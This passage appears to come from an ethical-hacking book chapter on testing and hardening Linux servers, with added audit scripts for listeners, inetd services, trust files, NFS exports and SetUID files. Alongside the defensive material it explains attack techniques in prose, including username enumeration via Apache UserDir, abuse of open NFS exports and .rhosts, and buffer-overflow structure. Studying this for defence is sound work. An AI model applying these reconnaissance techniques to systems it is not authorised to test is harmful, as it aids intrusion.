Figure 13-4: Using Nmap to determine the OS kernel version of a Linux server.

The Windows-based NetScanTools Pro also has the capability to determine the version of Linux that's running, as shown in Figure 13-5.

Figure 13-5: Using NetScanTools Pro to determine that Slackware Linux is likely running.

Countermeasures against system scanning

Although you can't completely prevent system scanning, you can still implement the following countermeasures to keep the bad guys from gleaning too much information about your systems and using it against you somehow:

Protect the systems with either:
A firewall, such as iptables (or its successor, nftables), that's built into the OS
A host-based intrusion prevention system, such as PortSentry (http://sourceforge.net/projects/sentrytools), a local agent such as Snare (www.intersectalliance.com/our-product/snare-agent), or McAfee Host Intrusion Prevention for Server (www.mcafee.com/us/products/host-ips-for-server.aspx) that ties into a larger security incident and event management (SIEM) system that monitors for and correlates network events, anomalies, and breaches

Disable the services you don't need, including RPC, HTTP, FTP, telnet, and the small UDP and TCP services — anything for which you don't have a true business need. This keeps the services from showing up in a port scan, which gives an attacker less information — and presumably less incentive — to break into your system. Make sure the latest software updates are installed to reduce the chance of exploitation if an attacker determines what services you're running.

Finding Unneeded and Unsecured Services

When you know which daemons and applications are running — such as FTP, telnet, and a web server — it's nice to know exactly which versions are running so you can look up their associated vulnerabilities and decide whether to turn them off. The National Vulnerability Database site (http://nvd.nist.gov) is a good resource for looking up vulnerabilities.

Searches

Several security tools can help uncover vulnerabilities in your Linux systems. These tools might not identify all applications down to the exact version number, but they're a very powerful way of collecting system information.

Vulnerabilities

Be especially mindful of these common security weaknesses in Linux systems:

Anonymous FTP — especially if it isn't properly configured — can provide a way for an attacker to download and access files on your system.
Telnet and FTP are vulnerable to network analyzer captures of the cleartext user ID and password the applications use. Their logins can also be brute-forced.
Old versions of sendmail and OpenSSL have many security issues, including denial of service flaws that can take systems offline.
R-services, such as rlogin, rdist, rexecd, rsh, and rcp, are especially vulnerable to attacks which rely on trust.

Many web servers run on Linux, so you can't overlook the importance of checking for weaknesses in Apache as well as Tomcat or other applications. For example, a common Linux vulnerability is that usernames can be determined via Apache when it doesn't have the UserDir directive disabled in its httpd.conf file. You can exploit this weakness manually by browsing to well-known user folders, such as http://www.your_site.com/~user_name (a 403 for an existing user versus a 404 for a nonexistent one is enough to confirm the account), or, better yet, by using a vulnerability scanner, such as AppSpider (www.rapid7.com/products/appspider) or Nexpose, to automatically enumerate the system. Either way, you may be able to find out which Linux users exist and then launch a web password cracking attack. There are also ways to access system files (including /etc/passwd) via vulnerable CGI and PHP code. I cover hacking web applications in Chapter 15.

Likewise, FTP is often running unsecured on Linux systems. I've found Linux systems with anonymous FTP enabled that were sharing sensitive healthcare and financial information to everyone on the local network. Talk about a lack of accountability! So, don't forget to look for the simple stuff. When testing Linux, you can dig down deep into the kernel and do this or that to carry out some uber-complex exploit, but it's usually the little things that get you. I've said it before, and it deserves mentioning again: look for the low-hanging fruit on your network, as that is the stuff that will get you into the most trouble the quickest.

Anonymous FTP is one of the most common vulnerabilities I find in Linux. If you must run an FTP server, make sure it's not sharing out sensitive information to all of your internal network users, or worse, the entire world. In my work, I see the former quite often and the latter periodically, which is more than I ever should.

Tools

The following tools can gather more in-depth information beyond port scanning to enumerate your Linux systems and see what others see:

Nmap can check for specific versions of the services loaded, as shown in Figure 13-6. Simply run Nmap with the -sV command-line switch.
netstat shows the services running on a local machine. Enter this command while logged in:

netstat -anp

(Current distributions often don't install netstat by default; ss -tulnp from the iproute2 package shows the same listening sockets and owning processes.)

List Open Files (lsof) displays processes that are listening and files that are open on the system.

To run lsof, log in and enter this command at a Linux command prompt: lsof. There are tons of options available via lsof -h. For example, lsof -i lists every network connection and listening socket along with the process behind it, and lsof +D /var/log shows which log files are currently held open and by which process. The lsof command can come in handy when you suspect that malware has found its way onto the system.

Figure 13-6: Using Nmap to check application versions.
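The chapter's tools show you the listeners; the next step a tester wants is to compare them against what the box is actually supposed to serve. The script below is an added example (mine, not one of the book's tools): it reads ss -tulnpH style output, skips loopback-only binds, and reports every listener that isn't on an allowlist of proto:port pairs. The ss sample, the allowlist, and the field layout it assumes are all constructed for the example.

```shell
#!/bin/sh
# Added example: compare the sockets a host listens on against an allowlist
# of services you actually need, and report everything else.
# Input is `ss -tulnpH` output (or `netstat -tulnp` minus its header) on stdin.

# Constructed ss-style sample: Netid State Recv-Q Send-Q Local Peer Process
SAMPLE_SS='udp UNCONN 0 0 0.0.0.0:111 0.0.0.0:* users:(("rpcbind",pid=412,fd=5))
udp UNCONN 0 0 0.0.0.0:19 0.0.0.0:* users:(("inetd",pid=530,fd=8))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=646,fd=3))
tcp LISTEN 0 511 *:80 *:* users:(("httpd",pid=701,fd=4))
tcp LISTEN 0 128 127.0.0.1:3306 0.0.0.0:* users:(("mysqld",pid=722,fd=9))
tcp LISTEN 0 10 0.0.0.0:23 0.0.0.0:* users:(("inetd",pid=530,fd=6))
tcp LISTEN 0 128 [::]:22 [::]:* users:(("sshd",pid=646,fd=4))'

# Services with a business need, as proto:port pairs (assumed for the example).
ALLOW='tcp:22
tcp:80'

# unexpected_listeners ALLOWLIST   (ss output on stdin)
# Prints "proto port bind process" for each listener missing from ALLOWLIST.
# Sockets bound only to loopback are skipped: the network cannot reach them.
unexpected_listeners() {
    allow="$1"
    while read -r proto state recvq sendq local peer proc; do
        [ -n "$proto" ] || continue
        # ss reports bound UDP sockets as UNCONN; treat them like LISTEN.
        case "$state" in LISTEN|UNCONN) ;; *) continue ;; esac
        port="${local##*:}"
        bind="${local%:*}"
        case "$bind" in 127.*|'[::1]') continue ;; esac
        if ! printf '%s\n' "$allow" | grep -qx "$proto:$port"; then
            # Pull the program name out of users:(("name",pid=...,fd=...))
            name=$(printf '%s\n' "$proc" | sed -n 's/.*(("\([^"]*\)".*/\1/p')
            printf '%s %s %s %s\n' "$proto" "$port" "$bind" "${name:-?}"
        fi
    done
}

# count_unexpected ALLOWLIST   (ss output on stdin): number of findings
count_unexpected() {
    unexpected_listeners "$1" | grep -c .
}

# Demo on the constructed sample. On a real host:
#   ss -tulnpH | unexpected_listeners "$(cat /etc/allowed-ports)"
printf '%s\n' "$SAMPLE_SS" | unexpected_listeners "$ALLOW"
```

On the sample this flags rpcbind on UDP 111, the chargen small service on UDP 19, and telnet on TCP 23; the MySQL listener on 127.0.0.1 is ignored and both sshd binds (IPv4 and IPv6) pass because tcp:22 is allowed. Anything the script prints is a service to either justify and add to the allowlist or disable in the next section.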

Countermeasures against attacks on unneeded services

You can and should disable the unneeded services on your Linux systems. This is one of the best ways to keep your Linux system secure. Like reducing the number of entry points (such as open doors and windows) into your house, the more entry points you eliminate, the fewer places an intruder can break in.

Disabling unneeded services

The best method of disabling unneeded services depends on whether the daemon is loaded in the first place. You have several places to disable services, depending on the version of Linux you're running.

If you don't need to run a particular service, take the safe route: Turn it off! Just give people on the network ample warning that it's going to happen in the event someone needs the service for their work.

inetd.conf (or xinetd.conf)

If it makes good business sense — that is, if you don't need them — disable unneeded services by commenting out the loading of daemons you don't use. Follow these steps:

1. Enter the following command at the Linux prompt: ps aux

The process ID (PID) for each daemon, including inetd, is listed on the screen. In Figure 13-7, the PID for the sshd (Secure Shell daemon) is 646. (ps aux, without the dash, is the BSD-style syntax procps documents; most versions also accept ps -aux.)

2. Make note of the PID for inetd.

3. Open /etc/inetd.conf in the Linux text editor vi by entering the following command: vi /etc/inetd.conf

or, on an xinetd system, /etc/xinetd.conf.

4. When you have the file loaded in vi, enable the insert (edit) mode by pressing I.

5. Move the cursor to the beginning of the line of the daemon that you want to disable, such as httpd (web server daemon), and type # at the beginning of the line.

This step comments out the line and prevents it from loading when you reboot the server or restart inetd. It's also good for record keeping and change management.

6. To exit vi and save your changes, press Esc to exit the insert mode, type :wq, and then press Enter.

This tells vi that you want to write your changes and quit.

7. Restart inetd by entering this command with the inetd PID: kill -HUP PID

Figure 13-7: Viewing the process IDs for running daemons by using ps aux.
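The seven steps above are an interactive edit; when you have more than a handful of hosts you'll want to script the same change and then prove it took. The script below is an added example and not from the book: it comments services out of an inetd.conf, flips disable = no to disable = yes in an xinetd.d service file (adding the line if it's missing), and lists what is still enabled. Both config files are constructed copies under a temp directory, so it is safe to run as-is; point the functions at /etc/inetd.conf and /etc/xinetd.d/<service> as root on a real system.

```shell
#!/bin/sh
# Added example: disable unneeded daemons in inetd.conf / xinetd.d and verify.
# The configs below are constructed copies; on a real host pass the live files.

set -u
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed /etc/inetd.conf: service socket proto wait user server args
cat >"$WORK/inetd.conf" <<'EOF'
# <service> <socket> <proto> <flags> <user> <server_path> <args>
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
shell   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rshd
login   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rlogind
exec    stream  tcp  nowait  root  /usr/sbin/tcpd  in.rexecd
chargen stream  tcp  nowait  root  internal
ssh     stream  tcp  nowait  root  /usr/sbin/sshd  sshd -i
EOF

# Constructed /etc/xinetd.d/rexec
mkdir -p "$WORK/xinetd.d"
cat >"$WORK/xinetd.d/rexec" <<'EOF'
service exec
{
        socket_type     = stream
        wait            = no
        user            = root
        server          = /usr/sbin/in.rexecd
        disable         = no
}
EOF

# inetd_disable FILE SERVICE...: put "#" in front of each active line whose
# first field is one of SERVICE. Lines already commented out are untouched.
inetd_disable() {
    f="$1"; shift
    for svc in "$@"; do
        sed "s/^\($svc[[:space:]]\)/#\1/" "$f" >"$f.tmp" && mv "$f.tmp" "$f"
    done
}

# xinetd_disable FILE: turn "disable = no" into "disable = yes"; if the
# service block has no disable line at all, add one before the closing brace.
xinetd_disable() {
    f="$1"
    if grep -q '^[[:space:]]*disable[[:space:]]*=' "$f"; then
        sed 's/^\([[:space:]]*disable[[:space:]]*=[[:space:]]*\)no[[:space:]]*$/\1yes/' "$f" >"$f.tmp"
    else
        awk '/^}/ { print "        disable         = yes" } { print }' "$f" >"$f.tmp"
    fi
    mv "$f.tmp" "$f"
}

# active_services FILE: the service names still enabled in an inetd.conf
active_services() {
    awk '!/^[ \t]*#/ && NF { print $1 }' "$1"
}

# xinetd_enabled FILE: succeeds when the service is NOT disabled
xinetd_enabled() {
    ! grep -Eq '^[[:space:]]*disable[[:space:]]*=[[:space:]]*yes' "$1"
}

# Demo: keep ftp and ssh; drop telnet, the r-services and the chargen small service.
inetd_disable "$WORK/inetd.conf" telnet shell login exec chargen
xinetd_disable "$WORK/xinetd.d/rexec"
echo "still enabled in inetd.conf:"; active_services "$WORK/inetd.conf"
# On the real system, make the daemons re-read their configs afterwards:
#   kill -HUP "$(pidof inetd)"      or      service xinetd reload
```

After the demo only ftp and ssh remain active in the inetd.conf copy and the rexec block reads disable = yes. Keep the .tmp-then-mv pattern when you adapt this: a half-written /etc/inetd.conf at the moment inetd gets its SIGHUP is worse than the services you were removing.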

chkconfig

If you don't have an inetd.conf file (or it's empty), your version of Linux is probably running the xinetd program — a more secure replacement for inetd — to listen for incoming network application requests. You can edit the /etc/xinetd.conf file if this is the case. For more information on the usage of xinetd and xinetd.conf, enter man xinetd or man xinetd.conf at a Linux command prompt. If you're running Red Hat 7.0 or later, you can run the /sbin/chkconfig program to turn off the daemons you don't want to load.

You can also enter chkconfig --list at a command prompt to see what services are enabled, including the xinetd-managed services from /etc/xinetd.d.

If you want to disable a specific service, say snmp, enter the following: chkconfig snmpd off

(chkconfig --del snmpd also stops it from starting, but that removes the service from chkconfig's management entirely rather than simply turning it off; chkconfig snmpd off is the reversible form. On systemd-based distributions the equivalent is systemctl disable --now snmpd.)

You can use the chkconfig program to disable other services, such as FTP, telnet, and web server.

Access control

TCP Wrappers can control access to critical services that you run, such as FTP. This program controls access for TCP services and logs their usage, helping you control access via hostname or IP address and track malicious activities. The rules live in /etc/hosts.allow and /etc/hosts.deny, and they apply only to daemons started through tcpd or linked against libwrap (sshd and the inetd services usually are; Apache is not).

You can find more information about TCP Wrappers from ftp://ftp.porcupine.org/pub/security/index.html.

Always make sure that your operating system and the applications running on it are not open to the world (or your internal network where that might matter) by ensuring that reasonable password requirements are in place. Don't forget to disable anonymous FTP unless you absolutely need it. Even if you do, limit system access to only those with a business need to access sensitive information.

Securing the .rhosts and hosts.equiv Files

Linux — and all the flavors of UNIX — are file-based operating systems. Practically everything that's done on the system involves the manipulation of files. This is why so many attacks against Linux are at the file level.

Hacks using the hosts.equiv and .rhosts files

If hackers can capture a user ID and password by using a network analyzer or can crash an application and gain root access via a buffer overflow, one thing they look for is what users are trusted by the local system. That's why it's critical to assess these files yourself. The /etc/hosts.equiv and .rhosts files list this information.

hosts.equiv

The /etc/hosts.equiv file won't give away root access information, but it does specify which accounts on the system can access services on the local host. For example, if tribe were listed in this file, all users on the tribe system would be allowed access. As with the .rhosts file, external hackers can read this file and then spoof their IP address and hostname to gain unauthorized access to the local system. Attackers can also use the names located in the .rhosts and hosts.equiv files to look for names of other computers to exploit.

.rhosts

The highly-important $HOME/.rhosts files in Linux specify which remote users can access the Berkeley Software Distribution (BSD) r-commands (such as rsh, rcp, and rlogin) on the local system without a password. This file is in a specific user's (including root) home directory, such as /home/jsmith. A .rhosts file may look like this:

tribe scott
tribe eddie

This file allows users scott and eddie on the remote system tribe to log in to the local host with the same privileges as the local user. If a plus sign (+) is entered in the remote-host and user fields, any user from any host could log in to the local system. The hacker can add entries into this file by using either of these tricks:

Manually manipulating the file
Running a script that exploits an unsecured Common Gateway Interface (CGI) script on a web-server application that's running on the system

This configuration file is a prime target for a malicious attack. On most Linux systems I've tested, these files aren't enabled by default. However, a user can create one in his or her home directory on the system — intentionally or accidentally — which can create a major security hole on the system.

Countermeasures against .rhosts and hosts.equiv file attacks

Use both of the following countermeasures to prevent hacker attacks against the .rhosts and hosts.equiv files in your Linux system.

Disabling commands

A good way to prevent abuse of these files is to disable the BSD r-commands. This can be done in two ways:

Comment out the lines starting with shell, login, and exec in inetd.conf.
Edit the rexec, rlogin, and rsh files located in the /etc/xinetd.d directory. Open each file in a text editor and change disable = no to disable = yes, as shown in Figure 13-8.

Figure 13-8: The rexec file showing the disable option.

In Red Hat Enterprise Linux, you can disable the BSD r-commands with the setup program:

1. Enter setup at a command prompt (or run system-config-services directly).
2. Select the appropriate services and click Disable.

Blocking access

A couple of countermeasures can block rogue access of the .rhosts and hosts.equiv files:

Block spoofed addresses at the firewall, as I outline in Chapter 9.
Set the read permissions for each file's owner only.

.rhosts: Enter this command in each user's home directory:

chmod 600 .rhosts

hosts.equiv: Enter this command in the /etc directory: chmod 600 hosts.equiv

You can also use Open Source Tripwire (http://sourceforge.net/projects/tripwire) to monitor these files and alert you when access is obtained or changes are made.
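Tripwire tells you when these files change; it doesn't tell you whether what's in them is dangerous today. The script below is an added example, not part of the chapter: it walks /etc/hosts.equiv and every ~/.rhosts, flags a "+" in the host or user field (the any-host and any-user wildcards described above), and flags any file whose permissions are looser than the chmod 600 the countermeasure calls for. The three fixture files it audits are constructed under a temp directory; call audit_trust_files / as root on a real system.

```shell
#!/bin/sh
# Added example: audit hosts.equiv and ~/.rhosts for over-broad trust entries
# and loose permissions. Fixtures are constructed; use audit_trust_files / live.

set -u
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed fixtures: one sane .rhosts, one wide-open one, one hosts.equiv
mkdir -p "$WORK/etc" "$WORK/home/jsmith" "$WORK/home/eddie"
printf 'tribe scott\ntribe eddie\n' >"$WORK/home/jsmith/.rhosts"
chmod 600 "$WORK/home/jsmith/.rhosts"
printf '+ +\n' >"$WORK/home/eddie/.rhosts"        # any user from any host
chmod 644 "$WORK/home/eddie/.rhosts"
printf 'tribe\n-badhost\n+\n' >"$WORK/etc/hosts.equiv"
chmod 600 "$WORK/etc/hosts.equiv"

# loose_perms FILE: succeeds when group or other can read or write the file
loose_perms() {
    [ -n "$(find "$1" \( -perm -040 -o -perm -004 -o -perm -020 -o -perm -002 \) -print)" ]
}

# trust_findings FILE: one line per dangerous entry. A "+" host field trusts
# every host; a "+" user field trusts every user on that host. Entries that
# start with "-" are explicit denials and "#" lines are comments.
trust_findings() {
    awk -v f="$1" '
        /^[ \t]*#/ || NF == 0 { next }
        $1 == "+"            { print f ": any host trusted (" $0 ")"; next }
        NF >= 2 && $2 == "+" { print f ": any user on " $1 " trusted (" $0 ")" }
    ' "$1"
}

# audit_trust_files ROOT: check ROOT/etc/hosts.equiv, ROOT/root/.rhosts and
# ROOT/home/*/.rhosts. Prints findings; no output is the goal.
audit_trust_files() {
    root="${1%/}"
    for f in "$root/etc/hosts.equiv" "$root/root/.rhosts" "$root"/home/*/.rhosts; do
        [ -f "$f" ] || continue
        trust_findings "$f"
        if loose_perms "$f"; then
            echo "$f: readable or writable by group/other (fix: chmod 600 $f)"
        fi
    done
}

audit_trust_files "$WORK"
```

On the fixtures this reports the bare "+" in hosts.equiv, the "+ +" in eddie's .rhosts, and eddie's 644 mode; jsmith's file, which only trusts two named users on tribe and is mode 600, produces nothing. The best result, of course, is that the loop finds no files at all because the r-commands are gone.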

Assessing the Security of NFS

The Network File System (NFS) is used to mount remote file systems (similar to shares in Windows) from the local machine. Given the remote access nature of NFS, it certainly has its fair share of hacks. I cover additional storage vulnerabilities and hacks in Chapter 16.

NFS hacks

If NFS was set up improperly or its configuration has been tampered with — namely, the /etc/exports file containing a setting that allows the world to read the entire file system — remote hackers can easily obtain remote access and do anything they want on the system. Assuming no access control list (ACL) is in place, all it takes is a line, such as the following, in the /etc/exports file:

/ rw

This line says that anyone can remotely mount the root partition in a read-write fashion. (That is the old SunOS-style syntax. With current nfs-utils the same hole is written as / *(rw), and adding no_root_squash to the options lets a remote root user act as root on your files as well.) Of course, the following conditions must also be true:

The NFS daemon (nfsd) must be running, along with the portmap daemon (rpcbind on current systems) that would map NFS to RPC.
The firewall must allow the NFS traffic through.
The remote systems that are allowed into the server running the NFS daemon must be placed into the /etc/hosts.allow file (where TCP Wrappers is in use).

This remote-mounting capability is easy to misconfigure. It's often related to a Linux administrator's misunderstanding of what it takes to share out the NFS mounts and resorting to the easiest way possible to get it working. If someone can gain remote access, the system is theirs. From a test machine, showmount -e <server> lists what a server exports and to whom, which is the quickest way to see what an attacker sees.

Countermeasures against NFS attacks

The best defense against NFS hacking depends on whether you actually need the service running.

If you don't need NFS, disable it. If you need NFS, implement the following countermeasures:

Filter NFS traffic at the firewall — typically, TCP and UDP port 111 (the portmapper port) if you want to filter all RPC traffic, plus TCP and UDP port 2049, which NFS itself listens on (NFSv4 needs only 2049).
Add network ACLs to limit access to specific hosts.
Make sure that your /etc/exports and /etc/hosts.allow files are configured properly to keep the world outside your network.
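Checking /etc/exports by eye works for one server; for a fleet you want the check scripted. The script below is an added example (mine, not from the book): it parses an exports file and reports shares exported to every host, read-write exports to the world, the root filesystem being exported, and no_root_squash. The exports file it reads is constructed, mixing the chapter's legacy / rw line with the modern client(options) syntax; run exports_findings /etc/exports on a real NFS server.

```shell
#!/bin/sh
# Added example: flag the /etc/exports mistakes this section describes.
# The exports file below is constructed; pass /etc/exports on a real server.

set -u
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

cat >"$WORK/exports" <<'EOF'
# constructed /etc/exports
/               rw
/srv/data       *(rw,sync)
/srv/pub        10.0.0.0/24(ro,sync)
/home           10.0.0.5(rw,no_root_squash)
/srv/iso        *.example.com(ro) 192.168.1.0/24(rw,root_squash)
EOF

# exports_findings FILE: one line per risky (path, client) pair.
# Each token after the path is client(options); (options) alone means any
# host; and, in the legacy SunOS-style syntax the chapter shows, a bare
# option word such as rw applies to every host.
exports_findings() {
    awk '
        function report(path, client, opts,    msg, world) {
            world = (client == "" || client == "*")
            msg = ""
            if (world)                              msg = msg "exported to every host; "
            if (world && opts ~ /(^|,)rw(,|$)/)     msg = msg "read-write; "
            if (opts ~ /(^|,)no_root_squash(,|$)/)  msg = msg "no_root_squash (remote root keeps uid 0); "
            if (path == "/")                        msg = msg "root filesystem; "
            if (msg != "") {
                sub(/; $/, "", msg)
                print path " " (client == "" ? "<any>" : client) ": " msg
            }
        }
        /^[ \t]*#/ || NF == 0 { next }
        {
            path = $1
            if (NF == 1) { report(path, "", ""); next }     # no client at all
            for (i = 2; i <= NF; i++) {
                tok = $i
                if (tok ~ /\(/) {                            # client(options)
                    n = index(tok, "(")
                    client = substr(tok, 1, n - 1)
                    opts = substr(tok, n + 1); sub(/\)$/, "", opts)
                } else if (tok ~ /^(rw|ro|sync|async)$/) {   # legacy bare option
                    client = ""; opts = tok
                } else {                                     # host, default options
                    client = tok; opts = ""
                }
                report(path, client, opts)
            }
        }
    ' "$1"
}

exports_findings "$WORK/exports"
```

Against the constructed file the output is three lines: the root filesystem exported read-write to everyone, /srv/data exported read-write to *, and /home handing remote root uid 0 via no_root_squash. The /srv/pub and /srv/iso lines, which restrict clients and keep root_squash, are silent. A read-only export to * still gets reported, because "every host" is the finding regardless of the mode.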

Checking File Permissions

In Linux, special file types allow programs to run with the file owner's rights:

SetUID (for user IDs)
SetGID (for group IDs)

SetUID and SetGID are required when a user runs a program that needs full access to the system to perform its tasks. For example, when a user invokes the passwd program to change his or her password, the program is actually loaded and run with root's privileges, because the passwd binary is owned by root and has the SetUID bit set. This is done so that the user can run the program and the program can update the password database without the user having to log in as root.

File permission hacks

By default, rogue programs that run with root privileges can be easily hidden. An external attacker or malicious insider might do this to hide hacking files, such as rootkits, on the system. This can be done with SetUID and SetGID coding in their hacking programs.

Countermeasures against file permission attacks

You can test for rogue programs by using both manual and automated testing methods.

Manual testing

The following commands can identify and print to the screen SetUID and SetGID programs:

Programs that are configured for SetUID: find / -perm -4000 -print
Programs that are configured for SetGID: find / -perm -2000 -print
Files that are writable by anyone in the world: find / -perm -2 -type f -print
Hidden files: find / -name ".*"

(The -perm -2 test matches the other-write bit, so it finds world-writable files rather than world-readable ones; a world-writable system file is the more dangerous condition anyway.)

You probably have hundreds of files in each of these categories, so don't be alarmed. When you discover files with these attributes set, you need to make sure that they are actually supposed to have those attributes by researching in your documentation or on the Internet, or by comparing them to a known secure system or data backup.

Keep an eye on your systems to detect any new SetUID or SetGID files that suddenly appear.
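"Keep an eye on your systems" in practice means a baseline and a diff. The script below is an added example, not the book's: it records the SetUID/SetGID files under a root, later reports any that weren't in the baseline, and lists world-writable files the way the find command above does. It runs on a constructed directory tree so it is safe to execute anywhere; on a real host use / as the root, ideally from a read-only boot medium so a rootkit that hooks find can't hide from it.

```shell
#!/bin/sh
# Added example: baseline SetUID/SetGID programs and report newcomers,
# plus the world-writable files the chapter's find command looks for.
# Runs on a constructed tree; use ROOT=/ on a real host.

set -u
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
ROOT="$WORK/root"

# Constructed "system": two setuid binaries, one setgid, one ordinary file
mkdir -p "$ROOT/usr/bin" "$ROOT/tmp"
for f in usr/bin/passwd usr/bin/su usr/bin/write usr/bin/ls; do : >"$ROOT/$f"; done
chmod 4755 "$ROOT/usr/bin/passwd" "$ROOT/usr/bin/su"
chmod 2755 "$ROOT/usr/bin/write"
chmod 755  "$ROOT/usr/bin/ls"

# list_privileged ROOT: sorted, ROOT-relative paths of SetUID or SetGID files.
# -xdev keeps find on the local filesystem (no NFS or /proc excursions).
list_privileged() {
    ( cd "$1" && find . -xdev -type f \( -perm -4000 -o -perm -2000 \) -print ) | sort
}

# list_world_writable ROOT: files any user on the box can modify
# (same test as "find / -perm -2": -perm -2 is the other-write bit)
list_world_writable() {
    ( cd "$1" && find . -xdev -type f -perm -0002 -print ) | sort
}

# new_privileged ROOT BASELINE: paths privileged now but absent from BASELINE
new_privileged() {
    list_privileged "$1" | comm -13 "$2" -
}

# Take the baseline on the known-good tree and keep it somewhere an intruder
# cannot edit (offline media, or a Tripwire database).
list_privileged "$ROOT" >"$WORK/setuid.baseline"

# Later, something drops a hidden setuid binary in /tmp and loosens a log file.
: >"$ROOT/tmp/.x";        chmod 4755 "$ROOT/tmp/.x"
: >"$ROOT/tmp/debug.log"; chmod 666  "$ROOT/tmp/debug.log"

echo "new SetUID/SetGID files since baseline:"; new_privileged "$ROOT" "$WORK/setuid.baseline"
echo "world-writable files:";                   list_world_writable "$ROOT"
```

The demo reports ./tmp/.x as the one privileged file not in the baseline and ./tmp/debug.log as world-writable. Schedule new_privileged from cron against a baseline you refresh after every legitimate package update, and treat any hit as an incident until you can explain it.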

Automatic testing

You can use an automated file modification auditing program to alert you when these types of changes are made. This is what I recommend — it's a lot easier on an ongoing basis:

A change-detection application, such as Open Source Tripwire, can help you keep track of what changed and when.
A file-monitoring program, such as COPS (point your web browser to ftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/cops), finds files that have changed in status (such as a new SetUID or removed SetGID).

Finding Buffer Overflow Vulnerabilities

RPC and other vulnerable daemons are common targets for buffer-overflow attacks. Buffer overflow attacks are often how the hacker can get in to modify system files, read database files, and more.

Attacks

In a buffer overflow attack, the attacker either manually sends strings of information to the victim Linux machine or writes a script to do so. These strings contain the following:

Instructions to the processor to basically do nothing (a run of NOPs, so the hijacked jump doesn't have to land on an exact address).
Malicious code to replace the attacked process. For example, exec("/bin/sh") creates a shell command prompt.
A pointer to the start of the malicious code in the memory buffer, which overwrites the saved return address on the stack.

If an attacked application (such as FTP or RPC) is running as root (certain programs do), this situation can give attackers root permissions in their remote shells. Specific examples of vulnerable software running on Linux are Samba, MySQL, and Firefox. Depending on the version, this software can be exploited using commercial or free tools such as Metasploit (www.metasploit.com) to obtain remote command prompts, add backdoor user accounts, change ownership of files, and more. I cover Metasploit in Chapter 12.

Countermeasures against buffer overflow attacks

Three main countermeasures can help prevent buffer-overflow attacks:

Disable unneeded services.
Protect your Linux systems with either a firewall or a host-based intrusion prevention system (IPS).
Put another access control mechanism, such as TCP Wrappers, in front of the service so only known hosts can reach it, and keep password (or key-based) authentication on the service itself. TCP Wrappers only checks where a connection comes from; it does not authenticate anyone.

Don't rely on access controls that go by an IP address or hostname alone. That can easily be spoofed.

As always, make sure that your systems have been updated with the latest kernel and software updates. Current kernels and compilers also give you non-executable stacks, address space layout randomization, and stack canaries, which turn many of these overflows from a root shell into a crash.

Checking Physical Security

Some Linux vulnerabilities involve the bad guy actually being at the system console — something that's entirely possible given the insider threats that every organization faces.

Physical security hacks

If an attacker is at the system console, anything goes, including rebooting the system (even if no one is logged in) by pressing Ctrl+Alt+Delete. After the system is rebooted, the attacker can start it in single-user mode, which allows the hacker to zero out the root password or possibly even read the entire shadow password file. I cover password cracking in Chapter 8.

Countermeasures against physical security attacks

Edit your /etc/inittab file and comment out (place a # sign in front of) the line that reads ca::ctrlaltdel:/sbin/shutdown -t3 -r now, shown in the last line of Figure 13-9. These changes will prevent someone from rebooting the system by pressing Ctrl+Alt+Delete. Be forewarned that this will also prevent you from legitimately using Ctrl+Alt+Delete. On systemd-based distributions there is no /etc/inittab; the equivalent is systemctl mask ctrl-alt-del.target. Blocking the key combination doesn't stop someone who can pull the power cord, so also set a boot loader (GRUB) password so that single-user mode and kernel parameters can't be chosen from the console.

Figure 13-9: /etc/inittab showing the line that allows a Ctrl+Alt+Delete shutdown.

For Linux-based laptops, use disk encryption software, such as WinMagic (www.winmagic.com) and Symantec (www.symantec.com), or the LUKS/dm-crypt full-disk encryption most distributions offer at install time. If you don't, when a laptop is lost or stolen, you could very well have a data breach on your hands and all the state, federal, compliance, and disclosure law requirements that go along with it. Not good!

If you believe that someone has recently gained access to your system, either physically or by exploiting a vulnerability, such as a weak password or buffer overflow, you can use the last program to view the last few logins into the system to check for strange login IDs or login times. This program peruses the /var/log/wtmp file and displays the users who logged in, most recent first. You can enter last | head to view only the first ten lines if you want to see just the most recent logins. Keep in mind that an attacker who got root can edit wtmp, so a clean last output is necessary but not sufficient.

Performing General Security Tests

You can assess critical, and often overlooked, security issues on your Linux systems, such as the following:

Misconfigurations or unauthorized entries in the shadow password files, which could provide covert system access
Password complexity requirements
Users equivalent to root
Suspicious automated tasks configured in cron, the script scheduler program
Signature checks on system binary files
Checks for rootkits
Network configuration, including measures to prevent packet spoofing and other denial of service (DoS) attacks
Permissions on system log files

You can do all these assessments manually — or better yet, use an automated tool to do it for you! Figure 13-10 shows the initiation of the Tiger security-auditing tool (www.nongnu.org/tiger), and Figure 13-11 shows a portion of the audit results. Talk about some great bang for no buck with this tool!

Figure 13-10: Running the Tiger security-auditing tool.

Figure 13-11: Partial output of the Tiger tool.

Alternatives to Tiger include Linux Security Auditing Tool (LSAT; http://usat.sourceforge.net) as well as Bastille UNIX (http://bastille-linux.sourceforge.net).

Patching Linux

Ongoing patching is perhaps the best thing you can do to enhance and maintain the security of your Linux systems. Regardless of the Linux distribution you use, using a tool to assist in your patching efforts makes your job a lot easier.

I often find Linux is completely out of the patch management loop. With the focus on patching Windows, many network administrators forget about the Linux systems they have on their network. Don't fall into this trap.

Distribution updates

The update process is different on every distribution of Linux. You can use the following tools, based on your specific distribution:

Red Hat: The following tools update Red Hat Linux systems:
RPM Package Manager (rpm), the low-level tool that installs and queries files with an .rpm extension, the format Red Hat and other free and open source developers use to package their programs. RPM was originally a Red Hat-centric system but is now used on many versions of Linux.
yum (and dnf on Fedora and newer Red Hat releases), the command-line, text-based tools that fetch updates from the distribution's repositories and resolve dependencies. The older up2date tool has been superseded by yum.
Debian: You can use the Debian package management system (dpkg, with apt or apt-get on top of it to fetch and apply updates) included with the operating system to update Debian Linux systems.
Slackware: You can use the Slackware Package Tool (pkgtool) included with the operating system to update Slackware Linux systems.
SUSE: SUSE Linux includes YaST2 software management (and zypper on the command line).

